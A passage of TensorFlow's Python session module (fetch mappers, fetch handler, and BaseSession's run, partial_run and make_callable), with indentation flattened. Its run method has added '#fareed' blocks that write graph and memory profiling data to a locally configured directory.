"""Returns the list of values from an attrs instance."""
attrs = getattr(obj.__class__, '__attrs_attrs__')
return [getattr(obj, a.name) for a in attrs]
class _FetchMapper(object):
"""Definition of the interface provided by fetch mappers.
Fetch mappers are utility classes used by the _FetchHandler to handle
arbitrary structures for the `fetch` argument to `Session.run()`.
The `fetch` argument can be of various shapes: single tensor or op, list of
fetches, tuple of fetches, namedtuple of fetches, or dict of fetches. The
structures can be arbitrarily nested.
The low level run() API only wants a list of tensor or op names. The various
`_FetchMapper` subclasses below take care of handling the different shapes:
uniquifying the fetches, and constructing results with the original shape.
"""
def unique_fetches(self):
"""Return the list of unique tensors or ops needed by this fetch mapper.
Returns:
A list of tensors or ops.
"""
raise NotImplementedError('Must be implemented by subclasses')
def build_results(self, values):
"""Build results that match the original shape of the fetch.
Args:
values: List of values returned by run(). The values correspond exactly to
the list tensors or ops returned by unique_fetches().
Returns:
A struct of the same shape as the original fetch object handled by
this fetch mapper. In the returned struct, the original fetches are
replaced by their fetched values.
"""
raise NotImplementedError('Must be implemented by subclasses')
@staticmethod
def for_fetch(fetch):
"""Creates fetch mapper that handles the structure of `fetch`.
The default graph must be the one from which we want to fetch values when
this function is called.
Args:
fetch: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
Returns:
An instance of a subclass of `_FetchMapper` that handles the shape.
"""
if fetch is None:
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
elif isinstance(fetch, (list, tuple)):
# NOTE(touts): This is also the code path for namedtuples.
return _ListFetchMapper(fetch)
elif isinstance(fetch, collections_abc.Mapping):
return _DictFetchMapper(fetch)
elif _is_attrs_instance(fetch):
return _AttrsFetchMapper(fetch)
else:
# Look for a handler in the registered expansions.
for tensor_type, fetch_fn, _, _ in _REGISTERED_EXPANSIONS:
if isinstance(fetch, tensor_type):
fetches, contraction_fn = fetch_fn(fetch)
return _ElementFetchMapper(fetches, contraction_fn)
# Did not find anything.
raise TypeError('Fetch argument %r has invalid type %r' %
(fetch, type(fetch)))
class _ElementFetchMapper(_FetchMapper):
"""Fetch mapper for singleton tensors and ops."""
def __init__(self, fetches, contraction_fn):
"""Creates an _ElementFetchMapper.
This is the fetch mapper used for leaves in the fetch struct. Because of
the expansions mechanism, a leaf can actually fetch more than one tensor.
Also note that the fetches here can be just strings (tensor or op names) or
any other object that the graph knows how to convert to a tensor, such as a
Variable. So we have to run each fetch through `as_graph_element()` to get
the corresponding tensor or op.
Args:
fetches: List of objects, as returned by a fetch_fn defined in
_REGISTERED_EXPANSIONS.
contraction_fn: Callable as returned by a fetch_fn.
"""
self._unique_fetches = []
for fetch in fetches:
try:
self._unique_fetches.append(ops.get_default_graph().as_graph_element(
fetch, allow_tensor=True, allow_operation=True))
except TypeError as e:
raise TypeError('Fetch argument %r has invalid type %r, '
'must be a string or Tensor. (%s)' %
(fetch, type(fetch), str(e)))
except ValueError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
except KeyError as e:
raise ValueError('Fetch argument %r cannot be interpreted as a '
'Tensor. (%s)' % (fetch, str(e)))
self._contraction_fn = contraction_fn
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
if not values:
# 'Operation' case
return None
else:
return self._contraction_fn(values)
def _uniquify_fetches(fetch_mappers):
"""Uniquifies fetches from a list of fetch_mappers.
This is a utility function used by _ListFetchMapper and _DictFetchMapper. It
gathers all the unique fetches from a list of mappers and builds a list
containing all of them but without duplicates (unique_fetches).
It also returns a 2-D list of integers (values_indices) indicating at which
index in unique_fetches the fetches of the mappers are located.
This list is as follows:
values_indices[mapper_index][mapper_fetch_index] = unique_fetches_index
Args:
fetch_mappers: list of fetch mappers.
Returns:
A list of fetches.
A 2-D list of integers.
"""
unique_fetches = []
value_indices = []
seen_fetches = object_identity.ObjectIdentityDictionary()
for m in fetch_mappers:
m_value_indices = []
for f in m.unique_fetches():
j = seen_fetches.get(f)
if j is None:
j = len(seen_fetches)
seen_fetches[f] = j
unique_fetches.append(f)
m_value_indices.append(j)
value_indices.append(m_value_indices)
return unique_fetches, value_indices
class _ListFetchMapper(_FetchMapper):
"""Fetch mapper for lists, tuples, and namedtuples."""
def __init__(self, fetches):
"""Creates a _ListFetchMapper.
Args:
fetches: List, tuple, or namedtuple of fetches.
"""
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in fetches]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
# Create the list of results for each mapper.
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
# Return a value of the original type of the fetches.
if issubclass(self._fetch_type, list):
return results
elif self._fetch_type == tuple:
return tuple(results)
else:
# This is the code path for namedtuple.
return self._fetch_type(*results)
class _DictFetchMapper(_FetchMapper):
"""Fetch mapper for dicts."""
def __init__(self, fetches):
"""Creates a _DictFetchMapper.
Args:
fetches: Dict of fetches.
"""
self._fetch_type = type(fetches)
self._keys = fetches.keys()
self._mappers = [
_FetchMapper.for_fetch(fetch) for fetch in fetches.values()
]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = self._fetch_type()
for k, m, vi in zip(self._keys, self._mappers, self._value_indices):
results[k] = m.build_results([values[j] for j in vi])
return results
class _AttrsFetchMapper(_FetchMapper):
"""Fetch mapper for attrs decorated classes."""
def __init__(self, fetches):
"""Creates a _AttrsFetchMapper.
Args:
fetches: An instance of an attrs decorated class.
"""
values = _get_attrs_values(fetches)
self._fetch_type = type(fetches)
self._mappers = [_FetchMapper.for_fetch(fetch) for fetch in values]
self._unique_fetches, self._value_indices = _uniquify_fetches(self._mappers)
def unique_fetches(self):
return self._unique_fetches
def build_results(self, values):
results = []
for m, vi in zip(self._mappers, self._value_indices):
results.append(m.build_results([values[j] for j in vi]))
return self._fetch_type(*results)
class _FetchHandler(object):
"""Handler for structured fetches.
Given a graph, a user-provided structure for fetches, and a feed dict, this
class takes care of generating a list of tensor names to fetch and op names
to run for a low level `run()` call.
Given the results of the low level run call, this class can also rebuild a
result structure matching the user-provided structure for fetches, but
containing the corresponding results.
"""
# TODO(touts): Make this class also take care of destructuring the feed
# dict instead of doing it in the callers.
def __init__(self, graph, fetches, feeds, feed_handles=None):
"""Creates a fetch handler.
Args:
graph: Graph of the fetches. Used to check for fetchability and to
convert all fetches to tensors or ops as needed.
fetches: An arbitrary fetch structure: singleton, list, tuple, namedtuple,
or dict.
feeds: A feed dict where keys are Tensors.
feed_handles: A dict from feed Tensors to TensorHandle objects used as
direct feeds.
"""
with graph.as_default():
self._fetch_mapper = _FetchMapper.for_fetch(fetches)
self._fetches = []
self._targets = []
self._feeds = feeds
self._feed_handles = (
feed_handles or object_identity.ObjectIdentityDictionary())
self._ops = []
self._fetch_handles = object_identity.ObjectIdentityDictionary()
for fetch in self._fetch_mapper.unique_fetches():
if isinstance(fetch, ops.Operation):
self._assert_fetchable(graph, fetch)
self._targets.append(fetch)
self._ops.append(True)
else:
self._assert_fetchable(graph, fetch.op)
self._fetches.append(fetch)
self._ops.append(False)
# Remember the fetch if it is for a tensor handle.
if (isinstance(fetch, ops.Tensor) and
(fetch.op.type == 'GetSessionHandle' or
fetch.op.type == 'GetSessionHandleV2')):
self._fetch_handles[fetch] = fetch.op.inputs[0].dtype
self._final_fetches = [x for x in self._fetches if x not in feeds]
def _assert_fetchable(self, graph, op):
if not graph.is_fetchable(op):
raise errors.InaccessibleTensorError(
'Operation %r has been marked as not fetchable. Typically this'
' happens when it is defined in another function or code block.'
' Use return values,explicit Python locals or TensorFlow collections'
' to access it.'
% op.name)
def fetches(self):
"""Return the unique names of tensors to fetch.
Returns:
A list of strings.
"""
return self._final_fetches
def targets(self):
"""Return the unique names of ops to run.
Returns:
A list of strings.
"""
return self._targets
def build_results(self, session, tensor_values):
"""Build results matching the original fetch shape.
`tensor_values` must be a list of the same length as
the one returned by `fetches()`, and holding the requested
fetch values.
This method builds a struct with the same shape as the original `fetches`
passed to the constructor, in which the fetches are replaced by their
fetched value.
Args:
session: The enclosing session. Used for tensor handles.
tensor_values: List of values matching the list returned by fetches().
Returns:
A structure of the same shape as the original `fetches` argument but
containing tensors or None (for fetched ops).
"""
full_values = []
assert len(self._final_fetches) == len(tensor_values)
i = 0
j = 0
for is_op in self._ops:
if is_op:
full_values.append(None)
else:
# If the fetch was in the feeds, use the fed value, otherwise
# use the returned value.
if self._fetches[i] in self._feed_handles:
# A fetch had a corresponding direct TensorHandle feed. Call eval()
# to obtain the Tensor value from the TensorHandle.
value = self._feed_handles[self._fetches[i]].eval()
else:
value = self._feeds.get(self._fetches[i])
if value is None:
value = tensor_values[j]
j += 1
dtype = self._fetch_handles.get(self._fetches[i])
if dtype:
full_values.append(session_ops.TensorHandle(value, dtype, session))
else:
full_values.append(value)
i += 1
assert j == len(tensor_values)
return self._fetch_mapper.build_results(full_values)
def _name_list(tensor_list):
"""Utility function for transitioning to the new session API.
Args:
tensor_list: a list of `Tensor`s.
Returns:
A list of each `Tensor`s name (as byte arrays).
"""
return [compat.as_bytes(t.name) for t in tensor_list]
class _DeviceAttributes(object):
"""Struct-like object describing a device's attributes.
Each device has 3 key properties:
- name: the fully-qualified TensorFlow path to the device. For
example: /job:worker/replica:0/task:3/device:CPU:0
- device_type: the type of the device (e.g. CPU, GPU, TPU, etc.)
- memory_limit_bytes: the maximum amount of memory available on the device
(in bytes).
"""
def __init__(self, name, device_type, memory_limit_bytes, incarnation):
self._name = device.canonical_name(name)
self._device_type = device_type
self._memory_limit_bytes = memory_limit_bytes
self._incarnation = incarnation
@property
def name(self):
return self._name
@property
def device_type(self):
return self._device_type
@property
def memory_limit_bytes(self):
return self._memory_limit_bytes
@property
def incarnation(self):
return self._incarnation
def __repr__(self):
return '_DeviceAttributes(%s, %s, %d, %d)' % (
self.name,
self.device_type,
self.memory_limit_bytes,
self.incarnation,
)
class BaseSession(SessionInterface):
"""A class for interacting with a TensorFlow computation.
The BaseSession enables incremental graph building with inline
execution of Operations and evaluation of Tensors.
"""
def __init__(self, target='', graph=None, config=None):
"""Constructs a new TensorFlow session.
Args:
target: (Optional) The TensorFlow execution engine to connect to.
graph: (Optional) The graph to be used. If this argument is None, the
default graph will be used.
config: (Optional) ConfigProto proto used to configure the session. If no
config is specified, the global default will be used. The global default
can be configured via the tf.config APIs.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
creating the TensorFlow session.
TypeError: If one of the arguments has the wrong type.
"""
_python_session_create_counter.get_cell().increase_by(1)
if graph is None:
self._graph = ops.get_default_graph()
else:
if not isinstance(graph, ops.Graph):
raise TypeError('graph must be a tf.Graph, but got %s' % type(graph))
self._graph = graph
self._closed = False
if target is not None:
try:
self._target = compat.as_bytes(target)
except TypeError:
if isinstance(target, config_pb2.ConfigProto):
raise TypeError('target must be a string, but got %s.'
' Did you do "Session(config)" instead of'
' "Session(config=config)"?' % type(target))
raise TypeError('target must be a string, but got %s' % type(target))
else:
self._target = None
self._delete_lock = threading.Lock()
self._dead_handles = []
if config is None:
config = context.context().config
if not isinstance(config, config_pb2.ConfigProto):
raise TypeError('config must be a tf.ConfigProto, but got %s' %
type(config))
if (mixed_precision_global_state.mixed_precision_graph_rewrite_is_enabled
and config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.OFF):
new_config = config_pb2.ConfigProto()
new_config.CopyFrom(config)
new_config.graph_options.rewrite_options.auto_mixed_precision = (
rewriter_config_pb2.RewriterConfig.ON)
config = new_config
elif (config.graph_options.rewrite_options.auto_mixed_precision !=
rewriter_config_pb2.RewriterConfig.ON):
mixed_precision_global_state.non_mixed_precision_session_created = True
self._config = config
self._add_shapes = config.graph_options.infer_shapes
self._session = None
opts = tf_session.TF_NewSessionOptions(target=self._target, config=config)
try:
# pylint: disable=protected-access
self._session = tf_session.TF_NewSessionRef(self._graph._c_graph, opts)
# pylint: enable=protected-access
finally:
tf_session.TF_DeleteSessionOptions(opts)
def list_devices(self):
"""Lists available devices in this session.
```python
devices = sess.list_devices()
for d in devices:
print(d.name)
```
Where:
Each element in the list has the following properties
name: A string with the full name of the device. ex:
`/job:worker/replica:0/task:3/device:CPU:0`
device_type: The type of the device (e.g. `CPU`, `GPU`, `TPU`.)
memory_limit: The maximum amount of memory available on the device.
Note: depending on the device, it is possible the usable memory could
be substantially less.
Raises:
tf.errors.OpError: If it encounters an error (e.g. session is in an
invalid state, or network errors occur).
Returns:
A list of devices in the session.
"""
raw_device_list = tf_session.TF_SessionListDevices(self._session)
device_list = []
size = tf_session.TF_DeviceListCount(raw_device_list)
for i in range(size):
name = tf_session.TF_DeviceListName(raw_device_list, i)
device_type = tf_session.TF_DeviceListType(raw_device_list, i)
memory = tf_session.TF_DeviceListMemoryBytes(raw_device_list, i)
incarnation = tf_session.TF_DeviceListIncarnation(raw_device_list, i)
device_list.append(
_DeviceAttributes(name, device_type, memory, incarnation))
tf_session.TF_DeleteDeviceList(raw_device_list)
return device_list
def close(self):
"""Closes this session.
Calling this method frees all resources associated with the session.
Raises:
tf.errors.OpError: Or one of its subclasses if an error occurs while
closing the TensorFlow session.
"""
if self._session and not self._closed:
self._closed = True
tf_session.TF_CloseSession(self._session)
def __del__(self):
# cleanly ignore all exceptions
try:
self.close()
except Exception: # pylint: disable=broad-except
pass
if self._session is not None:
try:
tf_session.TF_DeleteSession(self._session)
except (AttributeError, TypeError):
# At shutdown, `c_api_util`, `tf_session`, or
# `tf_session.TF_DeleteSession` may have been garbage collected, causing
# the above method calls to fail. In this case, silently leak since the
# program is about to terminate anyway.
pass
self._session = None
@property
def graph(self):
"""The graph that was launched in this session."""
return self._graph
@property
def graph_def(self):
"""A serializable version of the underlying TensorFlow graph.
Returns:
A graph_pb2.GraphDef proto containing nodes for all of the Operations in
the underlying TensorFlow graph.
"""
return self._graph.as_graph_def(add_shapes=self._add_shapes)
@property
def sess_str(self):
return self._target
def as_default(self):
"""Returns a context manager that makes this object the default session.
Use with the `with` keyword to specify that calls to
`tf.Operation.run` or `tf.Tensor.eval` should be executed in
this session.
```python
c = tf.constant(..)
sess = tf.compat.v1.Session()
with sess.as_default():
assert tf.compat.v1.get_default_session() is sess
print(c.eval())
```
To get the current default session, use `tf.compat.v1.get_default_session`.
*N.B.* The `as_default` context manager *does not* close the
session when you exit the context, and you must close the session
explicitly.
```python
c = tf.constant(...)
sess = tf.compat.v1.Session()
with sess.as_default():
print(c.eval())
# ...
with sess.as_default():
print(c.eval())
sess.close()
```
Alternatively, you can use `with tf.compat.v1.Session():` to create a
session that is automatically closed on exiting the context,
including when an uncaught exception is raised.
*N.B.* The default session is a property of the current thread. If you
create a new thread, and wish to use the default session in that
thread, you must explicitly add a `with sess.as_default():` in that
thread's function.
*N.B.* Entering a `with sess.as_default():` block does not affect
the current default graph. If you are using multiple graphs, and
`sess.graph` is different from the value of
`tf.compat.v1.get_default_graph`, you must explicitly enter a
`with sess.graph.as_default():` block to make `sess.graph` the default
graph.
Returns:
A context manager using this session as the default session.
"""
return ops.default_session(self)
def run(self, fetches, feed_dict=None, options=None, run_metadata=None):
"""Runs operations and evaluates tensors in `fetches`.
This method runs one "step" of TensorFlow computation, by
running the necessary graph fragment to execute every `Operation`
and evaluate every `Tensor` in `fetches`, substituting the values in
`feed_dict` for the corresponding input values.
The `fetches` argument may be a single graph element, or an arbitrarily
nested list, tuple, namedtuple, dict, or OrderedDict containing graph
elements at its leaves. A graph element can be one of the following types:
* A `tf.Operation`.
The corresponding fetched value will be `None`.
* A `tf.Tensor`.
The corresponding fetched value will be a numpy ndarray containing the
value of that tensor.
* A `tf.SparseTensor`.
The corresponding fetched value will be a
`tf.compat.v1.SparseTensorValue`
containing the value of that sparse tensor.
* A `get_tensor_handle` op. The corresponding fetched value will be a
numpy ndarray containing the handle of that tensor.
* A `string` which is the name of a tensor or operation in the graph.
The value returned by `run()` has the same shape as the `fetches` argument,
where the leaves are replaced by the corresponding values returned by
TensorFlow.
Example:
```python
a = tf.constant([10, 20])
b = tf.constant([1.0, 2.0])
# 'fetches' can be a singleton
v = session.run(a)
# v is the numpy array [10, 20]
# 'fetches' can be a list.
v = session.run([a, b])
# v is a Python list with 2 numpy arrays: the 1-D array [10, 20] and the
# 1-D array [1.0, 2.0]
# 'fetches' can be arbitrary lists, tuples, namedtuple, dicts:
MyData = collections.namedtuple('MyData', ['a', 'b'])
v = session.run({'k1': MyData(a, b), 'k2': [b, a]})
# v is a dict with
# v['k1'] is a MyData namedtuple with 'a' (the numpy array [10, 20]) and
# 'b' (the numpy array [1.0, 2.0])
# v['k2'] is a list with the numpy array [1.0, 2.0] and the numpy array
# [10, 20].
```
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. Each key in `feed_dict` can be
one of the following types:
* If the key is a `tf.Tensor`, the
value may be a Python scalar, string, list, or numpy ndarray
that can be converted to the same `dtype` as that
tensor. Additionally, if the key is a
`tf.compat.v1.placeholder`, the shape of
the value will be checked for compatibility with the placeholder.
* If the key is a
`tf.SparseTensor`,
the value should be a
`tf.compat.v1.SparseTensorValue`.
* If the key is a nested tuple of `Tensor`s or `SparseTensor`s, the value
should be a nested tuple with the same structure that maps to their
corresponding values as above.
Each value in `feed_dict` must be convertible to a numpy array of the dtype
of the corresponding key.
The optional `options` argument expects a [`RunOptions`] proto. The options
allow controlling the behavior of this particular step (e.g. turning tracing
on).
The optional `run_metadata` argument expects a [`RunMetadata`] proto. When
appropriate, the non-Tensor output of this step will be collected there. For
example, when users turn on tracing in `options`, the profiled info will be
collected into this argument and passed back.
Args:
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (described
above).
feed_dict: A dictionary that maps graph elements to values (described
above).
options: A [`RunOptions`] protocol buffer
run_metadata: A [`RunMetadata`] protocol buffer
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary (described above).
Order in which `fetches` operations are evaluated inside the call
is undefined.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
ValueError: If `fetches` or `feed_dict` keys are invalid or refer to a
`Tensor` that doesn't exist.
"""
#fareed
global the_settings_file_was_read
global training_itr
global profile
global profiling_path
if not the_settings_file_was_read:
the_settings_file_was_read = True
settings_path = os.environ['PARDNN_DIR']
with open(settings_path + 'settings.json', 'r') as f:
profiling_data = json.load(f)
profile = True if profiling_data['profile'] == 1 else False
profiling_path = profiling_data['profiling_path']
if profile:
options = tf.RunOptions(trace_level=tf.RunOptions.SOFTWARE_TRACE, report_tensor_allocations_upon_oom = True)
run_metadata = tf.RunMetadata()
#if profile: run_metadata = tf.RunMetadata()
#end fareed
options_ptr = tf_session.TF_NewBufferFromString(
compat.as_bytes(options.SerializeToString())) if options else None
run_metadata_ptr = tf_session.TF_NewBuffer() if run_metadata else None
try:
result = self._run(None, fetches, feed_dict, options_ptr,
run_metadata_ptr)
if run_metadata:
proto_data = tf_session.TF_GetBuffer(run_metadata_ptr)
run_metadata.ParseFromString(compat.as_bytes(proto_data))
finally:
if run_metadata_ptr:
tf_session.TF_DeleteBuffer(run_metadata_ptr)
if options:
tf_session.TF_DeleteBuffer(options_ptr)
#fareed
if profile:
tf.debugging.set_log_device_placement(True)
if training_itr % 10 == 0:
dot_rep = graph_to_dot(tf.get_default_graph())
with open(profiling_path + 'mtf_dot.dot', 'w') as fwr:
fwr.write(str(dot_rep))
operations_tensors = {}
operations_attributes = {}
operations_names = tf.get_default_graph().get_operations()
count1 = 0
count2 = 0
for operation in operations_names:
operation_name = operation.name
operations_info = tf.get_default_graph().get_operation_by_name(operation_name).values()
try:
operations_attributes[operation_name] = []
operations_attributes[operation_name].append(operation.type)
operations_attributes[operation_name].append(tf.get_default_graph(
).get_tensor_by_name(operation_name + ':0').dtype._is_ref_dtype)
except:
pass
if len(operations_info) > 0:
if not (operations_info[0].shape.ndims is None):
operation_shape = operations_info[0].shape.as_list()
operation_dtype_size = operations_info[0].dtype.size
if not (operation_dtype_size is None):
operation_no_of_elements = 1
for dim in operation_shape:
if not(dim is None):
operation_no_of_elements = operation_no_of_elements * dim
total_size = operation_no_of_elements * operation_dtype_size
operations_tensors[operation_name] = total_size
else:
count1 = count1 + 1
else:
count1 = count1 + 1
operations_tensors[operation_name] = -1
else:
count2 = count2 + 1
operations_tensors[operation_name] = -1
with open(profiling_path+'tensors_sz_32.txt', 'w') as f:
for tensor, size in operations_tensors.items():
f.write('"' + tensor + '"::' + str(size) + '\n')
with open(profiling_path+'operations_attributes.txt', 'w') as f:
for op, attrs in operations_attributes.items():
strr = op
for attr in attrs:
strr += '::' + str(attr)
strr += '\n'
f.write(strr)
#end fareed
_profile(run_metadata, training_itr)
mem_options = tf.profiler.ProfileOptionBuilder.time_and_memory()
mem_options["min_bytes"] = 0
mem_options["min_micros"] = 0
mem_options["output"] = 'file:outfile=' + profiling_path + 'mem_' + str(training_itr) + '.txt'
mem_options["select"] = ("bytes", "peak_bytes", "output_bytes",
"residual_bytes")
mem = tf.profiler.profile(
tf.Graph(), run_meta=run_metadata, cmd="scope", options=mem_options)
#end fareed
#fareed
training_itr += 1
#end fareed
return result
def partial_run(self, handle, fetches, feed_dict=None):
"""Continues the execution with more feeds and fetches.
This is EXPERIMENTAL and subject to change.
To use partial execution, a user first calls `partial_run_setup()` and
then a sequence of `partial_run()`. `partial_run_setup` specifies the
list of feeds and fetches that will be used in the subsequent
`partial_run` calls.
The optional `feed_dict` argument allows the caller to override
the value of tensors in the graph. See run() for more information.
Below is a simple example:
```python
a = array_ops.placeholder(dtypes.float32, shape=[])
b = array_ops.placeholder(dtypes.float32, shape=[])
c = array_ops.placeholder(dtypes.float32, shape=[])
r1 = math_ops.add(a, b)
r2 = math_ops.multiply(r1, c)
h = sess.partial_run_setup([r1, r2], [a, b, c])
res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2})
res = sess.partial_run(h, r2, feed_dict={c: res})
```
Args:
handle: A handle for a sequence of partial runs.
fetches: A single graph element, a list of graph elements, or a dictionary
whose values are graph elements or lists of graph elements (see
documentation for `run`).
feed_dict: A dictionary that maps graph elements to values (described
above).
Returns:
Either a single value if `fetches` is a single graph element, or
a list of values if `fetches` is a list, or a dictionary with the
same keys as `fetches` if that is a dictionary
(see documentation for `run`).
Raises:
tf.errors.OpError: Or one of its subclasses on error.
"""
# TODO(touts): Support feeding and fetching the same tensor.
return self._run(handle, fetches, feed_dict, None, None)
def partial_run_setup(self, fetches, feeds=None):
"""Sets up a graph with feeds and fetches for partial run.
This is EXPERIMENTAL and subject to change.
Note that contrary to `run`, `feeds` only specifies the graph elements.
The tensors will be supplied by the subsequent `partial_run` calls.
Args:
fetches: A single graph element, or a list of graph elements.
feeds: A single graph element, or a list of graph elements.
Returns:
A handle for partial run.
Raises:
RuntimeError: If this `Session` is in an invalid state (e.g. has been
closed).
TypeError: If `fetches` or `feed_dict` keys are of an inappropriate type.
tf.errors.OpError: Or one of its subclasses if a TensorFlow error happens.
"""
def _feed_fn(feed):
for tensor_type, _, _, feed_fn in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
if feeds is None:
feeds = []
# Create request.
feed_list = []
# Validate and process feed_list.
is_list_feed = isinstance(feeds, (list, tuple))
if not is_list_feed:
feeds = [feeds]
for feed in feeds:
for subfeed in _feed_fn(feed):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
# pylint: disable=protected-access
feed_list.append(subfeed_t._as_tf_output())
# pylint: enable=protected-access
except Exception as e:
e.message = ('Cannot interpret feed_list key as Tensor: ' + e.message)
e.args = (e.message,)
raise e
# Validate and process fetches.
# TODO(touts): Support feeding and fetching the same tensor.
fetch_handler = _FetchHandler(self._graph, fetches,
object_identity.ObjectIdentityDictionary())
# Set up a graph with feeds and fetches for partial run.
def _setup_fn(session, feed_list, fetch_list, target_list):
self._extend_graph()
return tf_session.TF_SessionPRunSetup_wrapper(session, feed_list,
fetch_list, target_list)
# pylint: disable=protected-access
final_fetches = [t._as_tf_output() for t in fetch_handler.fetches()]
final_targets = [op._c_op for op in fetch_handler.targets()]
# pylint: enable=protected-access
return self._do_call(_setup_fn, self._session, feed_list, final_fetches,
final_targets)
def _run(self, handle, fetches, feed_dict, options, run_metadata):
"""Perform either run or partial_run, depending the presence of `handle`."""
def _feed_fn(feed, feed_val):
for tensor_type, _, feed_fn, _ in _REGISTERED_EXPANSIONS:
if isinstance(feed, tensor_type):
return feed_fn(feed, feed_val)
raise TypeError('Feed argument %r has invalid type %r' %
(feed, type(feed)))
# Check session.
if self._closed:
raise RuntimeError('Attempted to use a closed Session.')
if self.graph.version == 0:
raise RuntimeError('The Session graph is empty. Add operations to the '
'graph before calling run().')
# Create request.
feed_dict_tensor = object_identity.ObjectIdentityDictionary()
feed_map = {}
# Validate and process feed_dict.
feed_handles = {}
if feed_dict:
feed_dict = nest.flatten_dict_items(feed_dict)
for feed, feed_val in feed_dict.items():
for subfeed, subfeed_val in _feed_fn(feed, feed_val):
try:
subfeed_t = self.graph.as_graph_element(
subfeed, allow_tensor=True, allow_operation=False)
except Exception as e:
raise TypeError('Cannot interpret feed_dict key as Tensor: ' +
e.args[0])
if isinstance(subfeed_val, ops.Tensor):
raise TypeError('The value of a feed cannot be a tf.Tensor object. '
'Acceptable feed values include Python scalars, '
'strings, lists, numpy ndarrays, or TensorHandles. '
'For reference, the tensor object was ' +
str(feed_val) + ' which was passed to the '
'feed with key ' + str(feed) + '.')
subfeed_dtype = subfeed_t.dtype.as_numpy_dtype
if isinstance(subfeed_val, int) and _convert_to_numpy_obj(
subfeed_dtype, subfeed_val) != subfeed_val:
raise TypeError(
'Type of feed value ' + str(subfeed_val) + ' with type ' +
str(type(subfeed_val)) +
' is not compatible with Tensor type ' + str(subfeed_dtype) +
'. Try explicitly setting the type of the feed tensor'
' to a larger type (e.g. int64).')
is_tensor_handle_feed = isinstance(subfeed_val,
session_ops.TensorHandle)
if is_tensor_handle_feed:
np_val = subfeed_val.to_numpy_array()
feed_handles[subfeed_t] = subfeed_val
else:
np_val = np.asarray(subfeed_val, dtype=subfeed_dtype)
if (not is_tensor_handle_feed and
not subfeed_t.get_shape().is_compatible_with(np_val.shape)):
raise ValueError(
'Cannot feed value of shape %r for Tensor %r, '
'which has shape %r' %
(np_val.shape, subfeed_t.name, str(subfeed_t.get_shape())))
if not self.graph.is_feedable(subfeed_t):
raise ValueError('Tensor %s may not be fed.' % subfeed_t)
feed_dict_tensor[subfeed_t] = np_val
feed_map[compat.as_bytes(subfeed_t.name)] = (subfeed_t, subfeed_val)
# Create a fetch handler to take care of the structure of fetches.
fetch_handler = _FetchHandler(
self._graph, fetches, feed_dict_tensor, feed_handles=feed_handles)
# Run request and get response.
# We need to keep the returned movers alive for the following _do_run().
# These movers are no longer needed when _do_run() completes, and
# are deleted when `movers` goes out of scope when this _run() ends.
# TODO(yuanbyu, keveman): Revisit whether we should just treat feeding
# of a handle from a different device as an error.
_ = self._update_with_movers(feed_dict_tensor, feed_map)
final_fetches = fetch_handler.fetches()
final_targets = fetch_handler.targets()
# We only want to really perform the run if fetches or targets are provided,
# or if the call is a partial run that specifies feeds.
if final_fetches or final_targets or (handle and feed_dict_tensor):
results = self._do_run(handle, final_targets, final_fetches,
feed_dict_tensor, options, run_metadata)
else:
results = []
return fetch_handler.build_results(self, results)
def make_callable(self, fetches, feed_list=None, accept_options=False):
"""Returns a Python callable that runs a particular step.
The returned callable will take `len(feed_list)` arguments whose types
must be compatible feed values for the respective elements of `feed_list`.
For example, if element `i` of `feed_list` is a `tf.Tensor`, the `i`th
argument to the returned callable must be a numpy ndarray (or something
convertible to an ndarray) with matching element type and shape. See
`tf.Session.run` for details of the allowable feed key and value types.
The returned callable will have the same return type as
`tf.Session.run(fetches, ...)`. For example, if `fetches` is a `tf.Tensor`,
the callable will return a numpy ndarray; if `fetches` is a `tf.Operation`,
it will return `None`.
Args:
fetches: A value or list of values to fetch. See `tf.Session.run` for
details of the allowable fetch types.
feed_list: (Optional.) A list of `feed_dict` keys. See `tf.Session.run`
for details of the allowable feed key types.
accept_options: (Optional.) If `True`, the returned `Callable` will be
able to accept `tf.compat.v1.RunOptions` and `tf.compat.v1.RunMetadata`
as optional keyword arguments `options` and `run_metadata`,
respectively, with the same syntax and semantics as `tf.Session.run`,
which is useful for certain use cases (profiling and debugging) but will
result in measurable slowdown of the `Callable`'s
performance. Default: `False`.
Returns:
A function that when called will execute the step defined by
`feed_list` and `fetches` in this session.
Raises:
TypeError: If `fetches` or `feed_list` cannot be interpreted
as arguments to `tf.Session.run`.
"""
if feed_list is not None:
if not isinstance(feed_list, (list, tuple)):
raise TypeError('`feed_list` must be a list or tuple.')
# Delegate any non-empty feed lists to the existing `run()` logic.
# TODO(mrry): Refactor the feed handling logic from
# `Session._run()` so that we can convert the feeds to a list of
# strings here.
def _generic_run(*feed_args, **kwargs):
feed_dict = {
feed: feed_val for feed, feed_val in zip(feed_list, feed_args)
}
return self.run(fetches, feed_dict=feed_dict, **kwargs)
return _generic_run
# Ensure any changes to the graph are reflected in the runtime.
# Note that we don't need to do this on subsequent calls to the
# returned object, because the arguments to `fetches` must already be
# in the graph.
self._extend_graph()
